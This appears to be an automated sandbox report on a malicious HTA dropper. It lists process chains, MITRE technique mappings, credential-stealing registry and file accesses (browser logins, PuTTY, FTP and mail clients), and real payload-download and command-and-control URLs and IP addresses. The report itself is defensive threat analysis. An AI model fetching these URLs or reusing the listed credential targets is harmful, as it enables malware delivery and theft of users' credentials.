                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5536, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 3092, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 0000000B.00000002.3274760441.0000000001298000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: PopPassword11_2_0040D069
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: SmtpPassword11_2_0040D069
                Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.powershell.exe.660c250.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 11.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information111
                Scripting
                Valid Accounts1
                Exploitation for Client Execution
                111
                Scripting
                1
                DLL Side-Loading
                11
                Deobfuscate/Decode Files or Information
                2
                OS Credential Dumping
                2
                File and Directory Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts12
                Command and Scripting Interpreter
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                2
                Obfuscated Files or Information
                2
                Credentials in Registry
                14
                System Information Discovery
                Remote Desktop Protocol2
                Data from Local System
                11
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts4
                PowerShell
                Logon Script (Windows)211
                Process Injection
                1
                Software Packing
                Security Account Manager11
                Security Software Discovery
                SMB/Windows Admin Shares11
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                DLL Side-Loading
                NTDS1
                Process Discovery
                Distributed Component Object ModelInput Capture115
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Masquerading
                LSA Secrets21
                Virtualization/Sandbox Evasion
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                Virtualization/Sandbox Evasion
                Cached Domain Credentials1
                Application Window Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Access Token Manipulation
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job211
                Process Injection
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1556631 Sample: kissmegoodthingwhichgivemeb... Startdate: 15/11/2024 Architecture: WINDOWS Score: 100 53 ip.1017.filemail.com 2->53 55 1017.filemail.com 2->55 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 77 18 other signatures 2->77 11 mshta.exe 1 2->11         started        signatures3 process4 signatures5 101 Detected Cobalt Strike Beacon 11->101 103 Suspicious powershell command line found 11->103 105 PowerShell case anomaly found 11->105 14 powershell.exe 30 11->14         started        process6 dnsIp7 61 192.3.243.136, 49704, 49748, 80 AS-COLOCROSSINGUS United States 14->61 49 seemybestthingswit...methingstodomyb.vbS, Unicode 14->49 dropped 51 C:\Users\user\AppData\...\glmzcldr.cmdline, Unicode 14->51 dropped 63 Detected Cobalt Strike Beacon 14->63 65 Suspicious powershell command line found 14->65 67 Obfuscated command line found 14->67 69 Found suspicious powershell code related to unpacking or dynamic code loading 14->69 19 wscript.exe 1 14->19         started        22 powershell.exe 21 14->22         started        24 csc.exe 3 14->24         started        27 conhost.exe 14->27         started        file8 signatures9 process10 file11 79 Detected Cobalt Strike Beacon 19->79 81 Suspicious powershell command line found 19->81 83 Wscript starts Powershell (via cmd or directly) 19->83 87 3 other signatures 19->87 29 powershell.exe 7 19->29         started        85 Loading BitLocker PowerShell Module 22->85 45 C:\Users\user\AppData\Local\...\glmzcldr.dll, PE32 24->45 dropped 32 cvtres.exe 1 24->32         started        signatures12 process13 signatures14 107 Detected Cobalt Strike Beacon 29->107 109 Suspicious powershell command line found 29->109 111 Obfuscated command line found 29->111 34 powershell.exe 15 16 29->34         started        38 conhost.exe 29->38         started        process15 dnsIp16 57 ip.1017.filemail.com 142.215.209.78, 443, 49705 HUMBER-COLLEGECA Canada 34->57 89 Writes to foreign memory regions 34->89 91 Injects a PE file into a foreign processes 34->91 40 aspnet_compiler.exe 148 34->40         started        signatures17 process18 dnsIp19 59 94.156.177.95, 49761, 49766, 49771 NET1-ASBG Bulgaria 40->59 47 C:\Users\user\AppData\Roaming\...\31437F.exe, PE32 40->47 dropped 93 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 40->93 95 Tries to steal Mail credentials (via file registry) 40->95 97 Tries to steal Mail credentials (via file / registry access) 40->97 99 2 other signatures 40->99 file20 signatures21

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                kissmegoodthingwhichgivemebestthignswithgirluaremy.hta21%ReversingLabsScript-JS.Trojan.Acsogenixx
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\188E93\31437F.exe0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://192.3.243.136/32/seemybes0%Avira URL Cloudsafe
                http://crl.microG0%Avira URL Cloudsafe
                http://94.156.177.95/simple/five/fre.php100%Avira URL Cloudmalware
                https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnT0%Avira URL Cloudsafe
                http://192.3.243.136/0%Avira URL Cloudsafe
                http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIF100%Avira URL Cloudmalware
                http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFon0%Avira URL Cloudsafe
                http://192.3.243.136/cate0%Avira URL Cloudsafe
                http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFility0%Avira URL Cloudsafe
                94.156.177.95/simple/five/fre.php100%Avira URL Cloudmalware
                http://192.3.243.136/32/seemybestthingswithentirelifetimU&0%Avira URL Cloudsafe
                http://192.3.243.136/32/SMPLLS.txt0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                ip.1017.filemail.com
                142.215.209.78
                truefalse
                  high
                  1017.filemail.com
                  unknown
                  unknownfalse
                    high
                    NameMaliciousAntivirus DetectionReputation
                    94.156.177.95/simple/five/fre.phptrue
                    • Avira URL Cloud: malware
                    unknown
                    http://kbfvzoboss.bid/alien/fre.phpfalse
                      high
                      http://alphastand.top/alien/fre.phpfalse
                        high
                        http://94.156.177.95/simple/five/fre.phptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904ffalse
                          high
                          http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFtrue
                          • Avira URL Cloud: malware
                          unknown
                          http://alphastand.win/alien/fre.phpfalse
                            high
                            http://alphastand.trade/alien/fre.phpfalse
                              high
                              http://192.3.243.136/32/SMPLLS.txttrue
                              • Avira URL Cloud: safe
                              unknown
                              NameSourceMaliciousAntivirus DetectionReputation
                              http://192.3.243.136/powershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6Spowershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.2201742184.0000000005B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082785336.000000000588A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://crl.microsoftpowershell.exe, 00000003.00000002.2088278913.0000000007FB0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          high
                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://192.3.243.136/32/seemybespowershell.exe, 00000001.00000002.2192931283.00000000053A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://go.micropowershell.exe, 00000001.00000002.2192931283.00000000053A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://crl.microGpowershell.exe, 00000009.00000002.2379784762.0000000006C83000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              http://www.ibsensoftware.com/aspnet_compiler.exe, aspnet_compiler.exe, 0000000B.00000002.3273628505.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                                high
                                                http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFilitypowershell.exe, 00000001.00000002.2204284614.000000000744D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTpowershell.exe, 00000009.00000002.2324609506.0000000000CE0000.00000004.00000020.00020000.00000000.sdmptrue
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://contoso.com/Licensepowershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://contoso.com/Iconpowershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://1017.filemail.compowershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://192.3.243.136/catepowershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://aka.ms/pscore6LRpowershell.exe, 00000007.00000002.2713596116.0000000004F36000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://go.microspowershell.exe, 00000003.00000002.2077991615.0000000004F56000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.2325175572.0000000004799000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIFonpowershell.exe, 00000001.00000002.2204284614.000000000744D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://crl.micropowershell.exe, 00000001.00000002.2192280720.0000000003109000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://1017.filemail.com/api/file/get?filekey=2aa_bwo9reu45t7bu1kvgsd9pt9pgsslvstgrntpowershell.exe, 00000009.00000002.2380660733.0000000006D11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://aka.ms/pscore6lBpowershell.exe, 00000001.00000002.2192931283.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2077991615.0000000004821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2713596116.0000000004F47000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.0000000004641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://192.3.243.136/32/seemybestthingswithentirelifetimU&powershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000003.00000002.2077991615.0000000004977000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://contoso.com/powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.2201742184.0000000005B8A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2082785336.000000000588A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.00000000056AA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.2192931283.0000000004B21000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2077991615.0000000004821000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2713596116.0000000004F28000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2325175572.0000000004641000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs
                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          142.215.209.78
                                                                          ip.1017.filemail.comCanada
                                                                          32156HUMBER-COLLEGECAfalse
                                                                          192.3.243.136
                                                                          unknownUnited States
                                                                          36352AS-COLOCROSSINGUStrue
                                                                          94.156.177.95
                                                                          unknownBulgaria
                                                                          43561NET1-ASBGtrue
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1556631
                                                                          Start date and time:2024-11-15 18:13:09 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 6m 58s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:default.jbs
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:13
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Sample name:kissmegoodthingwhichgivemebestthignswithgirluaremy.hta
                                                                          Detection:MAL
                                                                          Classification:mal100.phis.troj.spyw.expl.evad.winHTA@20/23@1/3
                                                                          EGA Information:
                                                                          • Successful, ratio: 33.3%
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 76
                                                                          • Number of non-executed functions: 14
                                                                          Cookbook Comments:
                                                                          • Found application associated with file extension: .hta
                                                                          • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe
                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                          • Execution Graph export aborted for target mshta.exe, PID 1264 because there are no executed function
                                                                          • Execution Graph export aborted for target powershell.exe, PID 3160 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 5732 because it is empty
                                                                          • Execution Graph export aborted for target powershell.exe, PID 5948 because it is empty
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                          • Report size getting too big, too many NtCreateKey calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: kissmegoodthingwhichgivemebestthignswithgirluaremy.hta
                                                                          TimeTypeDescription
                                                                          12:14:02API Interceptor124x Sleep call for process: powershell.exe modified
                                                                          12:14:33API Interceptor77x Sleep call for process: aspnet_compiler.exe modified
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          142.215.209.78Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                            Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                              SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                  INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                      Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                        SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                          seemebestthingswhichevermadebybestthingsgodown.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                            transferencia interbancaria_867897870877.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              192.3.243.136Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 192.3.243.136/32/SMPLLS.txt
                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 192.3.243.136/33/LOGLK.txt
                                                                                              94.156.177.95Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 94.156.177.95/simple/five/fre.php
                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 94.156.177.95/simple/five/fre.php
                                                                                              Scan docs.exeGet hashmaliciousLokibotBrowse
                                                                                              • 94.156.177.95/simple/five/fre.php
                                                                                              Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 94.156.177.95/simple/five/fre.php
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              ip.1017.filemail.comPurchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 142.215.209.78
                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 142.215.209.78
                                                                                              SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                              • 142.215.209.78
                                                                                              Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                              • 142.215.209.78
                                                                                              INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 142.215.209.78
                                                                                              Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                              • 142.215.209.78
                                                                                              Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 142.215.209.78
                                                                                              SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                              • 142.215.209.78
                                                                                              seemebestthingswhichevermadebybestthingsgodown.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                              • 142.215.209.78
                                                                                              transferencia interbancaria_867897870877.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • 142.215.209.78
                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                              HUMBER-COLLEGECAPurchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 142.215.209.78
                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 142.215.209.78
                                                                                              SAMPLE_PHOTO.jsGet hashmaliciousAgentTeslaBrowse
                                                                                              • 142.215.209.78
                                                                                              Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                              • 142.215.209.78
                                                                                              INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                              • 142.215.209.78
                                                                                              Order_Confirmation.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                              • 142.215.209.78
                                                                                              Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 142.215.209.78
                                                                                              SWIFT 103 202414111523339800 111124.pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                              • 142.215.209.78
                                                                                              seemebestthingswhichevermadebybestthingsgodown.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                              • 142.215.209.78
                                                                                              transferencia interbancaria_867897870877.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                              • 142.215.209.78
                                                                                              AS-COLOCROSSINGUSSignert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 107.173.4.61
                                                                                              New order.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 192.3.220.29
                                                                                              Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 192.3.243.136
                                                                                              Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                              • 192.3.243.136
                                                                                              Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 107.173.4.61
                                                                                              New order.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 192.3.220.29
                                                                                              Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 107.173.4.61
                                                                                              New order.xlsGet hashmaliciousUnknownBrowse
                                                                                              • 192.3.220.29
                                                                                              purchase order (2).xlsGet hashmaliciousUnknownBrowse
                                                                                              • 198.46.178.167
